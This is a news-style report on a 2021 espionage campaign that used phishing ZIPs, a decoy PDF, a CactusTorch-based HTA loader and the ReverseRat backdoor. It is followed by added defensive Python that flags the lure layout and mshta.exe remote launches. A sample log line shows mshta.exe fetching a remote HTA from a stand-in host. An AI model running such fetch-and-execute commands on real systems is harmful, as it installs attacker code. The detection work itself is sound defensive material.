Pakistan-linked hackers targeted Indian power company with ReverseRat (Security News, June 2021)
A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research.
Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization.
The intrusions are notable for a number of reasons, not least because, in addition to their highly targeted nature, the tactics, techniques, and procedures adopted by the adversary rely on repurposed open-source code and on compromised domains in the same country as the targeted entity to host the malicious files.
The attack commences with a malicious link sent via phishing emails or messages that, when clicked, downloads a ZIP archive file containing a Microsoft shortcut file and a decoy PDF file from a compromised domain.
The shortcut file, besides displaying the benign document to the unsuspecting recipient, also takes care of stealthily fetching and running an HTA file from the same compromised website.
Irrespective of the PDF document displayed to the victim, the HTA file - itself JavaScript code based on a GitHub project called CactusTorch - is leveraged to inject 32-bit shellcode into a running process to ultimately install a .NET backdoor called ReverseRat that runs the typical spyware gamut, with capabilities to capture screenshots, terminate processes, execute arbitrary executables, perform file operations, and upload data to a remote server.
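Two defender-side checks for the delivery chain described above, added here as example code that is not part of the original article or the cited research: one inspects a ZIP attachment for the shortcut-plus-decoy-document layout, the other flags process-creation log lines in which mshta.exe is handed a remote URL. The archive contents and log lines are constructed samples, and the field names in the log format are assumptions.

```python
import io
import re
import zipfile

# Lure layout from the article: a Windows shortcut (.lnk) bundled with a
# decoy document inside a ZIP archive. Extension sets are assumptions.
SHORTCUT_EXT = ".lnk"
DECOY_EXTS = (".pdf", ".doc", ".docx")

# mshta.exe launched with an http(s) URL as its argument, i.e. an HTA pulled
# from a web server rather than opened from local disk.
MSHTA_REMOTE = re.compile(r'mshta(\.exe)?\s+"?https?://', re.IGNORECASE)


def archive_findings(zip_bytes: bytes) -> dict:
    """Summarise a ZIP attachment: shortcut files present, whether a decoy
    document accompanies them, and an overall suspicious flag."""
    names = zipfile.ZipFile(io.BytesIO(zip_bytes)).namelist()
    shortcuts = [n for n in names if n.lower().endswith(SHORTCUT_EXT)]
    decoy_present = any(n.lower().endswith(DECOY_EXTS) for n in names)
    return {
        "shortcuts": shortcuts,
        "decoy_present": decoy_present,
        # A shortcut inside a mailed archive is unusual on its own; paired
        # with a decoy document it matches the lure pattern described.
        "suspicious": bool(shortcuts),
    }


def mshta_remote_events(log_lines) -> list:
    """Return the process-creation lines where mshta.exe receives a remote URL."""
    return [line for line in log_lines if MSHTA_REMOTE.search(line)]


def build_sample_zip() -> bytes:
    """Constructed sample archive mimicking the lure: shortcut plus decoy PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("open_document.lnk", b"placeholder shortcut bytes")
        zf.writestr("decoy.pdf", b"%PDF-1.4 placeholder decoy content")
    return buf.getvalue()


# Constructed process-creation events (field names are assumptions).
SAMPLE_LOGS = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe https://compromised.example/loader.hta"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe notes.txt"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe C:\\Tools\\local.hta"',
]

if __name__ == "__main__":
    print(archive_findings(build_sample_zip()))
    print(mshta_remote_events(SAMPLE_LOGS))
```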